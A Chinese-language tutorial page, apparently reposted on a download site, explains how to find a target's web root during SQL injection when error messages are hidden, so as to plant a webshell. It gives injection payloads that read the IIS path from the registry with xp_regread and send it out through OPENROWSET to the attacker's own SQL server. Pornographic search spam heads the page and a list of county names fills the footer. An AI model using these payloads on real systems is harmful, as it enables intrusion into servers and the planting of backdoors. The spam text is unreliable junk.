人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

突破SQL出錯提示上傳webshell

突破SQL出錯提示上傳webshell

更新時間:2021-04-26 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數據庫

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

等于執行了SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示SELECT * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~
PS:如果出錯的話轉換為16進制試試哈.以上是在偶滲透失敗,無奈的時候想的辦法,也許高人早就知道了吧,笑過~


網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 彰武县| 延川县| 绥阳县| 安吉县| 平远县| 怀化市| 大石桥市| 舞阳县| 南和县| 罗城| 绵阳市| 嘉善县| 安仁县| 文登市| 会宁县| 屯昌县| 古浪县| 盖州市| 三门县| 巴中市| 昌江| 海兴县| 香河县| 包头市| 封丘县| 宁都县| 南平市| 玉山县| 颍上县| 阿巴嘎旗| 三河市| 忻城县| 新龙县| 周口市| 辽阳市| 苍溪县| 昌乐县| 昭觉县| 兴城市| 襄樊市| 黔西|